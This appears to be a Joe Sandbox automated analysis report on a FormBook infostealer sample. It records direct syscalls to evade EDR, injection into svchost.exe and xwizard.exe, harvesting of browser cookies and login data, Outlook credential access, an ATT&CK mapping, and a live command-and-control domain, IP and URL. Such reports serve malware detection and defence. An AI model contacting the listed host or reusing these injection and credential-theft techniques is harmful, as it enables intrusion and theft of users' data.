Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03452835 mov eax, dword ptr fs:[00000030h]	7_2_03452835

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009D80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_009D80A9

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009AA124 SetUnhandledExceptionFilter,		0_2_009AA124
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009AA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_009AA155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: NULL target: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: NULL target: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\xwizard.exe

Thread APC queued: target process: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 606008

Jump to behavior

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009D87B1 LogonUserW,

0_2_009D87B1

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_00983B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00983B3A

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_009848D7

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009E4C27 mouse_event,

0_2_009E4C27

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\6SN0DJ38zZ.exe"	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009D7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009D7CAF

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009D874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009D874B

Source: 6SN0DJ38zZ.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 6SN0DJ38zZ.exe, gmbrlAYBeQOw.exe, 0000000A.00000000.1612371959.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122748207.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3122971577.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: gmbrlAYBeQOw.exe, 0000000A.00000000.1612371959.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122748207.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3122971577.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: gmbrlAYBeQOw.exe, 0000000A.00000000.1612371959.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122748207.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3122971577.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: gmbrlAYBeQOw.exe, 0000000A.00000000.1612371959.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000A.00000002.3122748207.00000000011C0000.00000002.00000001.00040000.00000000.sdmp, gmbrlAYBeQOw.exe, 0000000C.00000002.3122971577.0000000001320000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009A862B cpuid

0_2_009A862B

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009B4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009B4E87

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009C1E06 GetUserNameW,

0_2_009C1E06

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009B3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_009B3F3A

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_009849A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1690563091.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1690865350.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3124514909.0000000005140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2011724830.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1691658146.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3123079425.00000000032A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2012271134.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\xwizard.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: 6SN0DJ38zZ.exe	Binary or memory string: WIN_81
Source: 6SN0DJ38zZ.exe	Binary or memory string: WIN_XP
Source: 6SN0DJ38zZ.exe	Binary or memory string: WIN_XPe
Source: 6SN0DJ38zZ.exe	Binary or memory string: WIN_VISTA
Source: 6SN0DJ38zZ.exe	Binary or memory string: WIN_7
Source: 6SN0DJ38zZ.exe	Binary or memory string: WIN_8
Source: 6SN0DJ38zZ.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1690563091.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1690865350.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3124514909.0000000005140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2011724830.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1691658146.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3123079425.00000000032A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2012271134.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009F6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_009F6283
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009F6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_009F6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6SN0DJ38zZ.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://www.y6h6kn.top/jv64/?9XzpA=vNkxGXa&CfV=0rgj4Y9sgnjazUN/65XyfxBpTrrNkBjNZTVEPCZk5UU8x8xERo30l5WFjW3xVEpqAaMpb+WWzoUct0TX0HY75fQ4vaKwo5APNhg+4dJ1BHUS+Ec5quFNf0FyqqAWs9oIcQLGwWPPCUJQ	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.y6h6kn.top	103.23.149.28	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.y6h6kn.top/jv64/?9XzpA=vNkxGXa&CfV=0rgj4Y9sgnjazUN/65XyfxBpTrrNkBjNZTVEPCZk5UU8x8xERo30l5WFjW3xVEpqAaMpb+WWzoUct0TX0HY75fQ4vaKwo5APNhg+4dJ1BHUS+Ec5quFNf0FyqqAWs9oIcQLGwWPPCUJQ	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://ac.ecosia.org/autocomplete?q=	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	xwizard.exe, 0000000B.00000002.2014082459.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.23.149.28	www.y6h6kn.top	unknown		131349	DIGINET-AS-VNDigitaltelecomminicationservicejointstock	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574644
Start date and time:	2024-12-13 13:37:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6SN0DJ38zZ.exe renamed because original name is a hash value
Original Sample Name:	c0c3a82789a704a5ed3e165d9c61da76.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@2/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 96% Number of executed functions: 50 Number of non-executed functions: 273
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 20.12.23.50
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target gmbrlAYBeQOw.exe, PID 1768 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: 6SN0DJ38zZ.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.23.149.28	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.y6h6kn.top	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
www.y6h6kn.top	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	162.251.95.62

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGINET-AS-VNDigitaltelecomminicationservicejointstock	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	103.23.149.28
DIGINET-AS-VNDigitaltelecomminicationservicejointstock	http://103.23.144.53:15221/32A7E157.moe	Get hash	malicious	Unknown	Browse	103.23.144.53

Process:	C:\Users\user\Desktop\6SN0DJ38zZ.exe
File Type:	data
Category:	modified
Size (bytes):	287232
Entropy (8bit):	7.993766009454213
Encrypted:	true
SSDEEP:	6144:6C+fRuxSJlsJ21eOGekDZhjvJAJ/JJAL19op8/TLh2AJ9trtg:U5sROGekHzJA3yvCwTLhjJ9Xg
MD5:	F8F104B847CE08C8D2DE8DE58CCBE942
SHA1:	A74D19F99A4A1A196BE0F5BFBCE5F6FC153FAC30
SHA-256:	431F60B2EB8C660E1224D2BE82EB3CBFAE4F7B824FE7B2A44DFA67C9D2EEC2A2
SHA-512:	CA2787E5199B713E27F5716FFFF70D12433C71EAF60A275415CB9AF90143A6F331DE5D2C1AF3A1158167B6719E5B103D4A085C447199D9C0E76B834D47454CD3
Malicious:	false
Reputation:	low
